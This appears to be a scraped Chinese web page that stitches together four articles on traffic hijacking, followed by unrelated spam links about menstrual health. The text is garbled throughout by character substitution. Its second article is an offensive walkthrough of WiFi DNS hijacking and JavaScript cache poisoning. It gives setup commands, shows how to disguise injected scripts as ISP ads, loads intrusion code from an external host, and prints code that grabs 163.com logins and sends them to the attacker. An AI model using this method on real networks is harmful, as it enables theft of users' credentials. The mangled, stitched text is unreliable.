热搜
您的位置:首页 >> 旅游

流量劫持腾讯小米等结盟抵制流量劫持背后有

2019年05月14日 栏目:旅游

1 : 腾讯、小米等结盟抵制流量劫持,背后有何深意?导语:中国互联出现了6国联军本日头条、美团点评、360、腾讯、微博、小米等6家互联公

1 : 腾讯、小米等结盟抵制流量劫持,背后有何深意?

导语:中国互联出现了6国联军本日头条、美团点评、360、腾讯、微博、小米等6家互联公司共同发表了1份《6公司关于抵制流量劫持等背法行动的联合声明》。

12月25日,中国互联出现了6国联军本日头条、美团点评、360、腾讯、微博、小米等6家互联公司共同发表了1份《6公司关于抵制流量劫持等背法行动的联合声明》,呼吁联合抵制流量劫持等背法行动,并表态不排除采取联合行动的可能。

声明指出,困扰互联行业多年的流量劫持问题对互联公司、普通用户的正当利益均造成了严 重的侵害,劫持流量者提供的信息服务,由于完全脱离相干法律监管,放任这类非法劫持的泛滥,将带来没法挽回的恶果。6家公司希望社会各界充分重视流量劫 持这1问题的严重性,采取共同措施抑制劫持,共同打造1个健康、诚信、有序的市场环境。

先来阅览下声明全文:

6公司关于抵制流量劫持等背法行动的联合声明

我们6家公司(本日头条、美团大众点评、360、腾讯、微博、小米科技),在此联合表达共同诉求: 呼吁有关运营商严格打击流量劫持问题,重视互联公司被流量劫持,可能导致的严重后果。

进1步说明,目前的移动互联环境下,流量劫持方式主要分为两类:

1.域名劫持,表现为在用户正常联状态下(如3G、4G和WiFi等状态),目标域名会被歹意地毛病解析到其他IP地址上,造成用户没法正常使用服务。

2 .数据劫持,对返回的内容,会在其中强行插入弹窗或嵌入式广告等其他内容,干扰用户的正常使用,对用户体验构成极大伤害。

放任流量劫持将带来以下严重后果:首先,遵照市场规则的公司不能得到嘉奖,商誉和利益被严重伤害,而背法背规者却遭到鼓励;其次,用户使用我们的产品,意味着和我们之间构成严格的服务契约,流量被劫持,等于用户不能得到约定服务,从而导致利益遭到侵害;第3点,也是使人忧愁的地方在于,我们提供的信息服务,都是依照国家法律,并在有关职能部门监管下完成,而劫持流量者提供的信息服 务,完全脱离监管,乃至可能传播欺骗、色情等低俗乃至严重背法信息,如任由非法劫持泛滥,将造成没法挽回的恶果。

上述两类劫持和偷卖流量等行动,已有多项证据直接指向某些机构。鉴于劫持行动已涉嫌违背中国法律,如《电信条例》等,因此,我们在对恶意劫持做技术辨认和拦截之外,也向有关监管部门报案。

我们发表联合声明,是为引发全社会重视,我们不排除视局势发展,进1步采取联合行动的可能。

,我们再次呼吁,打击包括流量劫持在内的背法行动,不但关乎互联产业健康发展,也是包括运营商在内的所有游戏参与者的义务和。我们期待社会各界充分重视问题的严重性,采取共同措施抑制劫持,共同打造1个健康、诚信、有序的市场环境。

特此声明!

联合声明企业(按汉语拼音首写字母排序)

本日头条、美团大众点评、360、腾讯、微博、小米科技

看完这份联合声明,深深感遭到1份端着的正义感与使命感。然,又有多少人知晓流量劫持这事的玄机?先来淌1下这潭水。

流量劫持的水有多深?

1)流量劫持牟利犯法

所谓流量劫持,就是利用各种恶意软件修改阅读器、锁定主页或不停弹出新窗口,强迫用户访问某些站,从而造成用户流量损失的情形。作为危害络安全 的1大毒瘤,流量劫持引发的诉讼曾有先例。两年前,1家互联公司对另外一家公司的搜索结果进行标注,并向用户宣扬安装其阅读器,后者因此向法院起诉。 前者因干扰了他人互联产品或服务的正常运行,被法院判决赔偿后者40万元。

劫持流量行动不但背法,而且构成犯法。11月10日,据中国报导,上海市浦东新区人民法院判决了中国大陆首起流量劫持刑案,两名被告人被判有期徒刑3年,缓刑3年;扣押在案的作案工具和退缴在案的背法所得予以没收。

警方破案,两位犯法嫌疑人付某,陕西人,高中文化;黄某,广东人,大学文化。从2013年底至2014年10月,租赁多台服务器,使用歹意代码修改互联用户路由器的DNS设置来劫持流量,短短10个月2人获利75.47万余元人民币。

对劫持流量行动多以民事追究,虽然刑法没有直接设置劫持流量罪,但这其实不意味着劫持流量的行动不构成犯法。从劫持流量产生的拙劣后果来看,其行动不但导致了用户由于流量流失而遭受经济 损失,而且也因恶意软件的强行植入造成计算机系统的破坏,给络的正常运行带来极大的安全隐患,符合刑法第286条关于破坏计算机信息系统罪的构成要件。 相干法条对该罪的处罚10分严厉,后果严重的,处5年以下有期徒刑或拘役;后果特别严重的,处5年以上有期徒刑。

2)流量劫持原理

流量劫持也是1种络攻击,关系用户安全隐私等问题。其工作原理大致有这么几种:

协议攻击:Hub 嗅探、MAC 欺骗、MAC 冲洗、ARP 攻击、DHCP 钓鱼、DNS 劫持、CDN 入侵。

络设备攻击:路由器弱口令、路由器 CSRF、PPPoE 钓鱼、蜜罐代理。

络环境攻击:WiFi 弱口令、WiFi 伪热门、WiFi 强制断线、WLAN 基站钓鱼。

在冰盾防火墙站上的1篇《甚么是络流量劫持?揭秘详解黑客劫持的攻击手段与防御方法》有对应的案例解析。文章还指出,在流量劫持眼前,几近是人人同等的。络安全与传统的电脑操作系统安全不同,络是各种硬件装备组合的整体,木桶效应特别明显。即使有神1样的系统,但遇到猪1样的装备,你的安全等级瞬间就被拉低了。现在越来越流行便宜的小路由,它们可是承载着各种银、支付宝等等真金白银的交易流量,你能放心使用吗?

3)流量劫持亦成商战

虽然,你和饭酔份子1样对流量劫持嗤之以鼻,但是我们不能不承认,流量劫持也是1场商战。

先说下3大电信运营商。2013年7月,甘肃地区中国移动络对陌陌进行了劫持,致使该地区用户没法正常登录陌陌。愤怒之下,陌陌官方微博回应:经技术人员确认,从7月16日下午开始,甘肃地区中国移动络对陌陌进行了劫持,致使部份用户提示络认证失败,请确认时间正确

另外,中国移动被曝绑架,强行植入流量助手。中国联通同样成潜规则劫持流量,弹窗而引发用户不满,中国电信誉户也有类似的吐槽。运营商的流量劫持有1个共同点,第3方广告植入和利用软件排他。

今年5月,有UC神马搜索接到用户反馈,在河北、陕西等地,用户使用神马搜索,输入关键词后,输出的却是搜狗搜索的结果。不过经过核实后,神马搜索流量遭劫持或为电信运营商所为。此前,百度搜索和360导航都曾曝出遭受运营商流量劫持。

与此同时,百度与搜狗的1场围绕流量劫持的官司正在进行中,原告百度认为,搜狗通过其输入法及阅读器软件,恶意仿冒、混淆搜索框和搜索结果,劫持百度流量,并从中牟利,属于严重的不正当竞争行动,对百度造成了极大的社会负面影响和重大经济损失,因此要求搜狗方面赔偿损失及相干支出总计120万元,并公然道歉,消除不良影响。

不能不提的是,以360为代表的安全软件,用户在目标文件下载时,常常会接到默许推送其他软件包下载,这难道不算1种变相流量劫持?

为何是是这6家公司站出来?背后有何深意?

,我们来看1下此次《关于抵制流量劫持等背法行动的联合声明》的6家公司,本日头条、美团点评、360、腾讯、微博、小米公司。为何是他们?他们又处于何种目的来主导反流量劫持?

从互联产品属性权重可知,本日头条是移动阅读,美团点评是交易平台,360为络安全,腾讯明显是社交,微博则是社会化媒体,除游戏、金融,它们基本上已涵盖了互联领域的细分方向。

《关于抵制流量劫持等背法行动的联合声明》背后应当没有政府机构的表态和推动,这次行动能达成,估计还是这些公司出于塑造企业品牌形象的需要,只要具体行动方案未公布及履行进度不公然透明,那只能说这6家公司开了个抵制流量劫持的空头支票。从全部互联行业的层面来说,如果没有更多的公司加入抵制流量劫持的联合行动,或达成1种行业行动的公约,那末这6家公司的示范作用是10分有限的。

固然,要做抵制流量劫持这件事,首先这6家公司要把自己的屁股擦干净,要不然会成为1个笑话。

2 : WiFi流量劫持—— JS脚本缓存投毒

在上1篇《WiFi流量劫持 阅读任意页面便可中毒》构思了1个时光机原型,让我们的脚本通过HTTP缓存机制,在未来的某个时刻被履行,因此我们可以实现超大范围的入侵了。(]

基于此原理,我们用NodeJS来实现1个简单的样例。得益于node强大的IO管理,和各种封装好的络模块,我们可以很容易实现这个想法:

开启1个特殊的DNS服务:所有域名都解析到我们的电脑上。并把Wifi的DHCP-DNS设置为我们的电脑IP。以后连上Wifi的用户打开任何站,要求都将被我们的node服务收到。我们根据http头中的host字段来转发到真正服务器上。收到服务器返回的数据以后,我们就能够实现页脚本的注入,并返回给用户了!当注入的脚本被履行,用户的阅读器将顺次预加载各大站的经常使用脚本库。我们将其感染,并设置超长的缓存时间。因而大功告成!

为了方便测试和控制,已把全部流程:DNS、HTTP代理、代码分析和注入都使用NodeJS编写,并整合在1起。下面就来测试1下!

取得Demo: ()

# npm install -g closurether

运行:

# closurether

启动成功的话,会输出:

[SYS] local ip: 192.168.1.250 [DNS] running 0.0.0.0:53 [WEB] listening 0.0.0.0:80

[WEB] listening 0.0.0.0:443

固然,192.168.1.250这是我本地的IP,推荐使用固定的IP地址。

打开无线路由器-DHCP配置,将主DNS设置为自己的IP,重启路由。到此,你已控制了全部无线络的流量了!

用另外1台电脑连上你的wifi:

这时候会发现,ping任何域名,不出意外的话都会返回你的IP,DNS劫持已发挥作用了!

$ ping PING (192.168.1.250): 56 data bytes Request timeout for icmp_seq 0 $ ping PING (192.168.1.250): 56 data bytes Request timeout for icmp_seq 0

打开任意页,1切正常。我们可以在node控制台看到用户访问的每个要求。

固然这时候页上甚么效果也没出现。这个Demo毕竟是个间谍程序,怎样可能会有界面呢?

想看效果的话修改项目里的asset/inject/,往里面加1条:

alert('Hello World');

这时候再刷新页面,效果出现了!

打开任意页的源文件,发现其中都注入了我们的脚本内容。为了隐蔽性,这里将注入的脚本假装成运营商的url,他人还以为是联通宽带插的广告 ^_^

具体想伪装成甚么地址,可以在on里配置。

脚本内容正是asset/inject/文件:

到此,我们已实现把javascript代码注入到WiFi络的HTTP流量里了!

下面测试我们的终纵目标:能穿越到未来实行的脚本时光机。

前面仔细视察的话,不难发现注入的脚本内容里多出1大堆url,这些正是我们需要让用户预加载并缓存的各大站脚本。具体原理在上1篇里已详细讲授了。

如果想入侵更多的站,往tool/cache-sniffer/t里添加。运行:

$ phantomjs

程序将自动更新注入脚本的内容。

要想预加载并缓存1个脚本很容易,只需new Image().src='...'。固然有少数阅读器不支持,不过ie和chrome都是支持的。虽然js文件其实不是1个图片,但依然会缓存。

上1篇文章已说明,为了减少1次要求大量脚本文件消耗的带宽,我们其实不返回真实的原始脚本文件,而是1个很小的桩文件,用来启动我们的入侵代码,和恢复原始脚本文件。

因此这个桩文件代码量非常少,区区百来字节而已。例如hao123站下的某个已被感染了的脚本:

我们创建两个script元素,来加载外的入侵代码,和恢复原始脚本代码,使页能正常运行。注意:原始脚本url后面的?1必不可少,否则又会从缓存里加载被感染确当前脚本,进入死循环。

使用ite的好处在于,它创建的脚本是异步加载顺序履行的。所以在原始脚本未加载完之前,后面的脚本不会实行,避免了未定义毛病的产生。

入侵代码的url可以在on里hacker_url字段配置。为了保证未来被感染的脚本被唤醒时,能正常调出你的入侵代码,所以选择1个可靠的外来寄存。

本Demo演示如何入侵并截获易首页的账号,可以参考代码:。

演示中的代码很简单,仅仅捕捉用户在易首页上输入的账号和密码而已,然后传给后台保存到数据库里。

var url = ef; if (/\.163\.com/st(url)) { function onSubmit() { post( e('#js_loginframe_username').value, e('input[type=password]').value ); } e('.ntes-loginframe-btn').addEventListener('click', onSubmit); e('input[type=password]').addEventListener('keydown', function(e) { if (yCode == 13) { onSubmit(); } }); }扩大:dns缓存投毒攻击 / arp缓存投毒攻击 / 缓存投毒

下面重启电脑,并连上家里的WiFi。(连过KFC的用户回家以后的情况)

这时候用户的流量已完全不在我们的可控当中,看我们的脚本是否是仍能从沉睡当中唤醒呢?

打开,1切正常~

输入用户名密码,1切正常~

仿佛并没有感觉到任何的异常。回到我们自己的电脑上来看看,后台的笼子里是不是有猎物捕捉到。。。

很好,我们的入侵代码已成功履行,在用户离开了我们的络以后照旧能够运行!只要登录了我们事前感染过的那些站,入侵代码都将会被唤醒。

事实上,只要用户不清空缓存,这段代码终将附着在硬盘缓存里,直到过期。有多是1个星期,乃至数月的时间。

所谓1时失足成千古恨莫过于此。1时大意连接了1个wifi热门,不经意间特务已潜入你的阅读器缓存里。。。

==============================

使用NodeJS,我们只需数百行代码就实现了这个想法。固然,简单的同时缺点也是不言而喻的。node只提供了传输层的络接口,我们没法操作底层络数据。所以只能使用DNS劫持的方法来获得用户的流量。因此也就产生了1个非常纠结的问题:

怎样才能肯定用户查询的域名是HTTP主机呢?

由于我们把所有的域名都解析到了自己的电脑上,因此包括其他的络程序数据也转发到了我们这里。但是我们的node只监听了tcp:80端口,对其他的端口则是完全疏忽的。

即使我们监听了其他端口,我们也没法把收到的数据转发到真实的服务器 我们根本不知道发到哪个地址上!

HTTP之所以能实现转发,得益于头部有个host字段;而非HTTP协议,乃至包括HTTPS,我们只能收到1堆2进制数据,然后就不知道的该交给谁了。

此问题虽然没法避免,但也有1定程度的解决方案:

1.) 事前搜集各大站的域名。以后用户查询的域名在列表里的话,直接返回自己的电脑IP;否则转发给外DNS。

当记录足够多的话,我们可以拦截住用户大多数的站流量。

但要搜集大量的站域名其实不容易,而且仍会有很多的遗漏。因此我们使用更简单的方法:

2.) 依然将所有的域名解析到自己电脑上,但域名TTL时间很短,几秒后就过期。

如果在以后的几秒时间里,收到访问这个域名的http要求(host字段是这个域名),那末就认为这个域名是http服务的;

如果规定时间里没有收到,那末就当作非http服务的域名。当域名ttl过期后,下次再查询这个域名时,就解析到外真实的服务器IP了。反正不是http协议,收到了也没用。

3.) 尝试访问前来要求域名的80端口。如果能连接上,就当作是1个Web域名。就返回自己的IP。

目前使用方法3来辨认域名。事实上基于DNS的流量劫持还有更大缺点:

如果用户手工设置的DNS怎样办?比如8.8.8.8的用户就非常多。不是80端口的站又如何是好?难道我们要把1~65535的端口都监听吗?1个站域名下同时有http和其他服务了,拦截就致使那个服务不可用了。麻烦确当属纯IP的站,那么就完全没法拦截了~纠结的地方就不再吐槽,不然就实现不了我们的想法了,以后再使用node扩大渐渐完善。

即便面临着很多问题,我们的Demo仍能顺利跑起来 完全依照我们的料想运行!

==============================

后记

补充1个更简明的演示:

之前的 Demo 临时写的,比较混乱,1直没有更新。而且局域里也用不着 DNS 的方式,用 DHCP 劫持的方式效果更好。

扩大:dns缓存投毒攻击 / arp缓存投毒攻击 / 缓存投毒

3 : 详解黑客修改WordPress核心文件,劫持站流量

大家都知道如果黑客入侵我们的站后,他们是可以肆意的在上面搭载钓鱼页面,传播歹意软件,盗取敏感信息等,这非常不利于我们站。

垃圾内容和黑名单

近期,我们分析了1个被重定向到第3方域名的站。黑客通常利用这类类型的恶意跳转,劫持站流量,重定向到其它站。

黑客攻击站传播垃圾内容,出于两个目的:

利用你的用户提高影响力和产生流量

欺骗搜索引擎提高他们自己站的排名

暂且不论他们的动机,这些垃圾内容会影响你的站的用户和名誉。

很不幸,许多站长直到收到来自用户的反应、被加入黑名单,或在搜索引擎结果页面(Search Engine Result Pages ,SERP)上被加上警告标记时,才发觉他们的站被黑。当Google怀疑某个站在发布垃圾内容,他们会在SERP中添加以下标记:

可以在这里了解更多关于这个标记的知识。

为了解决这1问题,站长需要依照这个步骤来移除SERP的正告。如果攻击者用站来传播恶意软件等不正当活动,Google会将该站加入黑名单,给访问者显示以下页面:

修改核心文件 如果荣幸的话,站长可以快速辨认出攻击。但不幸的是,攻击常常会潜伏几天乃至几周。黑客不断研究新的方法调剂和隐藏他们的歹意内容,导致站长难和时发现。

有1位站长发现他的站把访客重定向到1个恶意域名,以下:

⑻-c⑼.html

⑻⑴-product-key-generator/

访客被重定向到攻击者的域名以后,会看到下面的图片:

这太糟了,原来的站其实不是售卖Windows序列号的。

黑客插入了1些代码,实行重定向,以下:

规避搜索引擎 这段代码做了甚么?除加载恶意页面并展现给用户以外,它还试图规避搜索引擎的检测。此类重定向的目的1般是,在站长不知情的情况下将流量定向到自己的域名。为了让攻击隐藏得更深,他们还会规避Google这样的搜素引擎。

为了禁止Google将页面标记为歹意,这段代码试图规避这1危险。如果SERP显示了正告信息,搜索者就不大可能点击它了,这会导致攻击失效。

监测和保护

每分钟都有站重定向,插入垃圾内容,站资产遭到影响。我们也发现另外1个被黑的站,攻击者修改了CMS的核心文件,履行歹意活动。如果你有文件完全性监测工具,并且做了备份,就能够很容易恢复到站的正常状态。仔细检查日志也很重要,可以找到被攻击的出发点,避免再次遭受攻击。就防御而言,使用web利用防火墙,和修改密码。

如果你发现站被黑,想要自己清算站,而且使用的是WordPress的话,可以参考这个方法-如何清算被黑的WordPress站。

4 : 谢绝流量劫持:淘宝、天猫全站启用HTTPS

说起流量劫持,大家应当都不陌生,特别是喜欢购的。所谓流量劫持,就是利用各种歹意软件修改阅读器、锁定主页或不停弹出新窗口,强迫用户访问某些站。

这不但会致使用户没法顺利访问目标站,还会偷跑用户流量、盗取用户隐私、引诱访问钓渔站、偷窃账号密码,而电商站常常是流量劫持的重点照顾对象。

目前,Google、Facebook等大型互联公司均已宣布支持全站HTTPS,而阿里巴巴旗下淘宝、天猫、1688等电商平台及其移动客户端,也已正式在全站启用HTTPS。

阿里巴巴也由此成为国内第1家支持全站HTTPS的电商公司,而京东、亚马逊等仅仅是在登录或交易页面启用了HTTPS,可在1定程度上保护账户安全,但没法抵抗流量劫持。

国家层面也在积极推动立法,加大对流量劫持等行动的打击力度,例如2015年11月,上海就判决了国内首起流量劫持刑事案件,两名被告人被判处有期徒刑3年、缓刑3年,不过法规健全总是需要时间,同时也需要互联服务供应商自己行动起来。

从技术角度看,全站HTTPS是目前抵抗流量劫持的安全解决方案。支持该协议的站都会在阅读器地址栏以绿色标注,用户可以放心阅读。

HTTPS怎样保护用户安全?

简单来说,HTTPS是通过加密传输来更好地保护用户的个人隐私和账户资金,那末具体是怎样做的呢?这里用快递包裹来形象地描写1下。

首先是数据保密性。

HTTPS能保证内容在传输进程中不会被第3方知晓。这就好像你去发快递的时候,将物品封装得严严实实,并且在封口处贴上快递单,他人就没法知道包裹里面是甚么。

其次是数据完全性。

HTTPS能及时发现被中间人或黑客篡改的传输内容。如果快递给你的包裹在运输途中被调包或有破坏,你就可以够轻松发现并谢绝签收。

是身份校验。

HTTPS能保证数据到达用户期望的目的地。每件需要快递的包裹均会有详细的投递地址,以保证其不会被送错地方。

月经量多如何调理
治月经过多的中成药
如何调理月经过少